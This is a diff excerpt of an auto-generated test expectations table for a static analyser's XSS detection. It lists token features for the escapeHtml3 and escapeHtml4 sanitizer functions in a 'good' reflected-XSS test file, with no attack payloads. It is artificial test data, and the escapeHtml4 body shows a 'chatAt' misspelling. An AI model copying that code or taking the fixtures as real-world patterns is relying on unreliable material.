0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:26 | ch === XMLChars.GT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:26 | ch === XMLChars.GT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:23 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:23 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:23 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:23 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:23 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:26 | XMLChars.GT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:26 | XMLChars.GT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:26 | XMLChars.GT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:26 | XMLChars.GT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:16:99:26 | XMLChars.GT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:25:99:26 | GT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:25:99:26 | GT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:25:99:26 | GT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:25:99:26 | GT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:25:99:26 | GT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:7 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:7 | i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:7 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:7 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:7 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i++ | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i++ | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i++ | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i++ | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:102:7:102:9 | i++ | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:9 | j | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:9 | j | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:9 | j | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:9 | j | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:9 | j | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:13 | j < i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:13 | j < i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:13 | j < i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:13 | j < i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:9:104:13 | j < i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:13:104:13 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:13:104:13 | i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:13:104:13 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:13:104:13 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:104:13:104:13 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:11 | parts | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:11 | parts | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:11 | parts | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:11 | parts | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:11 | parts | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:16 | parts.push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:16 | parts.push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:16 | parts.push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:16 | parts.push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:16 | parts.push | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | exceptional return of parts.p ... (j, i)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | exceptional return of parts.p ... (j, i)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | exceptional return of parts.p ... (j, i)) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | exceptional return of parts.p ... (j, i)) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | exceptional return of parts.p ... (j, i)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | parts.p ... (j, i)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | parts.p ... (j, i)) | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | parts.p ... (j, i)) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | parts.p ... (j, i)) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:7:105:39 | parts.p ... (j, i)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:13:105:16 | push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:13:105:16 | push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:13:105:16 | push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:13:105:16 | push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:13:105:16 | push | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:22 | value | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:22 | value | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:22 | value | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:22 | value | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:22 | value | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:32 | value.substring | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:32 | value.substring | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:32 | value.substring | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:32 | value.substring | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:32 | value.substring | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | exceptional return of value.s ... g(j, i) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | exceptional return of value.s ... g(j, i) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | exceptional return of value.s ... g(j, i) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | exceptional return of value.s ... g(j, i) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | exceptional return of value.s ... g(j, i) | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | value.s ... g(j, i) | CalleeFlexibleAccessPath | parts.push | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | value.s ... g(j, i) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | value.s ... g(j, i) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20921,6 +139529,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | value.s ... g(j, i) | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | value.s ... g(j, i) | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:18:105:38 | value.s ... g(j, i) | receiverName | parts | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:24:105:32 | substring | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:24:105:32 | substring | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:24:105:32 | substring | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:24:105:32 | substring | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:24:105:32 | substring | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:34:105:34 | j | CalleeFlexibleAccessPath | value.substring | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:34:105:34 | j | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:34:105:34 | j | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20937,6 +139550,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:37:105:37 | i | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:37:105:37 | i | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:105:37:105:37 | i | receiverName | value | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:14 | parts | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:14 | parts | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:14 | parts | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:14 | parts | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:14 | parts | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:19 | parts.join | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:19 | parts.join | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:19 | parts.join | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:19 | parts.join | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:19 | parts.join | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | exceptional return of parts.join('') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | exceptional return of parts.join('') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | exceptional return of parts.join('') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | exceptional return of parts.join('') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | exceptional return of parts.join('') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | parts.join('') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | parts.join('') | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | parts.join('') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | parts.join('') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:10:108:23 | parts.join('') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:16:108:19 | join | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:16:108:19 | join | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:16:108:19 | join | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:16:108:19 | join | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:16:108:19 | join | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:21:108:22 | '' | CalleeFlexibleAccessPath | parts.join | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:21:108:22 | '' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:21:108:22 | '' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20945,6 +139583,141 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:21:108:22 | '' | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:21:108:22 | '' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:108:21:108:22 | '' | receiverName | parts | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:112:0 | this | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:112:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:112:0 | this | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:112:0 | this | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:112:0 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | 'arguments' object of function escapeHtml4 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | 'arguments' object of function escapeHtml4 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | 'arguments' object of function escapeHtml4 | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | 'arguments' object of function escapeHtml4 | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | 'arguments' object of function escapeHtml4 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | exceptional return of function escapeHtml4 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | exceptional return of function escapeHtml4 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | exceptional return of function escapeHtml4 | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | exceptional return of function escapeHtml4 | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | exceptional return of function escapeHtml4 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | functio ... buf;\\n} | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | functio ... buf;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | functio ... buf;\\n} | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | return of function escapeHtml4 | 